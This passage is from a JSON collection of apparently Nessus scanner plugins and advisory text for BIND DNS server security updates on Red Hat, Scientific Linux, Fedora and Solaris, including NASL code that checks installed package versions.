(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-devel-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libbind-devel-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libs-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-devel / bind-libbind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:43:56", "description": "It was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n - when using an LDAP backend, missing function\n declarations caused segmentation faults, due to stripped\n pointers on machines where pointers are longer than\n integers.\n\n - starting named may have resulted in named crashing, due\n to a race condition during D-BUS connection\n initialization. This has been resolved in these updated\n packages.\n\n - the named init script returned incorrect error codes,\n causing the 'status' command to return an incorrect\n status. In these updated packages, the named init script\n is Linux Standard Base (LSB) compliant.\n\n - in these updated packages, the 'rndc [command] [zone]'\n command, where [command] is an rndc command, and [zone]\n is the specified zone, will find the [zone] if the zone\n is unique to all views.\n\n - the default named log rotation script did not work\n correctly when using the bind-chroot package. In these\n updated packages, installing bind-chroot creates the\n symbolic link '/var/log/named.log', which points to\n '/var/named/chroot/var/log/named.log', which resolves\n this issue.\n\n - a previous bind update incorrectly changed the\n permissions on the '/etc/openldap/schema/dnszone.schema'\n file to mode 640, instead of mode 644, which resulted in\n OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n\n - the 'checkconfig' parameter was missing in the named\n usage report. For example, running the 'service named'\n command did not return 'checkconfig' in the list of\n available options.\n\n - due to a bug in the named init script not handling the\n rndc return value correctly, the 'service named stop'\n and 'service named restart' commands failed on certain\n systems.\n\n - the bind-chroot spec file printed errors when running\n the '%pre' and '%post' sections. Errors such as the\n following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n - installing the bind-chroot package creates a\n '/dev/random' file in the chroot environment; however,\n the '/dev/random' file had an incorrect SELinux label.\n Starting named resulted in an 'avc: denied { getattr }\n for pid=[pid] comm='named' path='/dev/random'' error\n being logged. The '/dev/random' file has the correct\n SELinux label in these updated packages.\n\n - in certain situations, running the 'bind +trace' command\n resulted in random segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n - support has been added for GSS-TSIG (RFC 3645).\n\n - the 'named.root' file has been updated to reflect the\n new address for L.ROOT-SERVERS.NET.\n\n - updates BIND to the latest 9.3 maintenance release.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : bind on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2007-6283"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080521_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60402);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6283\", \"CVE-2008-0122\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the bind packages created the 'rndc.key' file\nwith insecure file permissions. This allowed any local user to read\nthe content of this file. A local user could use this flaw to control\nsome aspects of the named daemon by using the rndc utility, for\nexample, stopping the named daemon. This problem did not affect\nsystems with the bind-chroot package installed. (CVE-2007-6283)\n\nA buffer overflow flaw was discovered in the 'inet_network()'\nfunction, as implemented by libbind. An attacker could use this flaw\nto crash an application calling this function, with an argument\nprovided from an untrusted source. (CVE-2008-0122)\n\nAs well, these updated packages fix the following bugs :\n\n - when using an LDAP backend, missing function\n declarations caused segmentation faults, due to stripped\n pointers on machines where pointers are longer than\n integers.\n\n - starting named may have resulted in named crashing, due\n to a race condition during D-BUS connection\n initialization. This has been resolved in these updated\n packages.\n\n - the named init script returned incorrect error codes,\n causing the 'status' command to return an incorrect\n status. In these updated packages, the named init script\n is Linux Standard Base (LSB) compliant.\n\n - in these updated packages, the 'rndc [command] [zone]'\n command, where [command] is an rndc command, and [zone]\n is the specified zone, will find the [zone] if the zone\n is unique to all views.\n\n - the default named log rotation script did not work\n correctly when using the bind-chroot package. In these\n updated packages, installing bind-chroot creates the\n symbolic link '/var/log/named.log', which points to\n '/var/named/chroot/var/log/named.log', which resolves\n this issue.\n\n - a previous bind update incorrectly changed the\n permissions on the '/etc/openldap/schema/dnszone.schema'\n file to mode 640, instead of mode 644, which resulted in\n OpenLDAP not being able to start. In these updated\n packages, the permissions are correctly set to mode 644.\n\n - the 'checkconfig' parameter was missing in the named\n usage report. For example, running the 'service named'\n command did not return 'checkconfig' in the list of\n available options.\n\n - due to a bug in the named init script not handling the\n rndc return value correctly, the 'service named stop'\n and 'service named restart' commands failed on certain\n systems.\n\n - the bind-chroot spec file printed errors when running\n the '%pre' and '%post' sections. Errors such as the\n following occurred :\n\nLocating //etc/named.conf failed: [FAILED]\n\nThis has been resolved in these updated packages.\n\n - installing the bind-chroot package creates a\n '/dev/random' file in the chroot environment; however,\n the '/dev/random' file had an incorrect SELinux label.\n Starting named resulted in an 'avc: denied { getattr }\n for pid=[pid] comm='named' path='/dev/random'' error\n being logged. The '/dev/random' file has the correct\n SELinux label in these updated packages.\n\n - in certain situations, running the 'bind +trace' command\n resulted in random segmentation faults.\n\nAs well, these updated packages add the following enhancements :\n\n - support has been added for GSS-TSIG (RFC 3645).\n\n - the 'named.root' file has been updated to reflect the\n new address for L.ROOT-SERVERS.NET.\n\n - updates BIND to the latest 9.3 maintenance release.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0805&L=scientific-linux-errata&T=0&P=1821\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b2d3a59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.4-6.P1.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.4-6.P1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:13", "description": " - fixed address of L.ROOT-SERVERS.NET (#411141)\n\n - CVE-2007-6283\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-12-24T00:00:00", "title": "Fedora 7 : bind-9.4.2-2.fc7 (2007-4658)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "modified": "2007-12-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:bind", "p-cpe:/a:fedoraproject:fedora:caching-nameserver", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2007-4658.NASL", "href": "https://www.tenable.com/plugins/nessus/29764", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-4658.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29764);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\");\n script_xref(name:\"FEDORA\", value:\"2007-4658\");\n\n script_name(english:\"Fedora 7 : bind-9.4.2-2.fc7 (2007-4658)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - fixed address of L.ROOT-SERVERS.NET (#411141)\n\n - CVE-2007-6283\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=411141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=423061\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-December/006133.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?af9e71d5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"bind-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-chroot-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-debuginfo-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-devel-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-libs-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-sdb-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"bind-utils-9.4.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"caching-nameserver-9.4.2-2.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:06:13", "description": " - bind-chroot-admin called restorecon on /proc filesystem\n (#405281)\n\n - 9.5.0b1 release (#405281, #392491)\n\n - stop with initscript will fail if rndc was disabled\n (#417431)\n\n - fixed IDN support in dig and host utilities (#412241)\n\n - added dst/gssapi.h to -devel subpackage (#419091)\n\n - CVE-2007-6283 - /etc/rndc.key file had insecure\n permissions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-12-24T00:00:00", "title": "Fedora 8 : bind-9.5.0-20.b1.fc8 (2007-4655)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6283"], "modified": "2007-12-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:bind-utils", "p-cpe:/a:fedoraproject:fedora:bind-sdb", "p-cpe:/a:fedoraproject:fedora:bind-debuginfo", "p-cpe:/a:fedoraproject:fedora:bind-libs", "p-cpe:/a:fedoraproject:fedora:bind-chroot", "p-cpe:/a:fedoraproject:fedora:bind-devel"], "id": "FEDORA_2007-4655.NASL", "href": "https://www.tenable.com/plugins/nessus/29763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-4655.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29763);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-6283\");\n script_xref(name:\"FEDORA\", value:\"2007-4655\");\n\n script_name(english:\"Fedora 8 : bind-9.5.0-20.b1.fc8 (2007-4655)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - bind-chroot-admin called restorecon on /proc filesystem\n (#405281)\n\n - 9.5.0b1 release (#405281, #392491)\n\n - stop with initscript will fail if rndc was disabled\n (#417431)\n\n - fixed IDN support in dig and host utilities (#412241)\n\n - added dst/gssapi.h to -devel subpackage (#419091)\n\n - CVE-2007-6283 - /etc/rndc.key file had insecure\n permissions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=392491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=405281\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=412241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=417431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=419091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=419421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=423071\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-December/006049.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f66d8b03\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"bind-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-chroot-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-debuginfo-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-devel-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-libs-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-sdb-9.5.0-20.b1.fc8\")) flag++;\nif (rpm_check(release:\"FC8\", reference:\"bind-utils-9.5.0-20.b1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:01:27", "description": "SunOS 5.8_x86: libresolv.so.2, in.named an.\nDate this patch was last updated by Sun : Mar/09/09", "edition": 23, "published": "2004-07-12T00:00:00", "title": "Solaris 8 (x86) : 109327-24", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0122", "CVE-2008-1447", "CVE-2007-2930", "CVE-2009-0696", "CVE-2008-4194"], "modified": "2004-07-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_109327.NASL", "href": "https://www.tenable.com/plugins/nessus/13429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13429);\n script_version(\"1.52\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2930\", \"CVE-2008-0122\", \"CVE-2008-1447\", \"CVE-2008-4194\", \"CVE-2009-0696\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"Solaris 8 (x86) : 109327-24\");\n script_summary(english:\"Check for patch 109327-24\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109327-24\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: libresolv.so.2, in.named an.\nDate this patch was last updated by Sun : Mar/09/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/109327-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109327-24\", 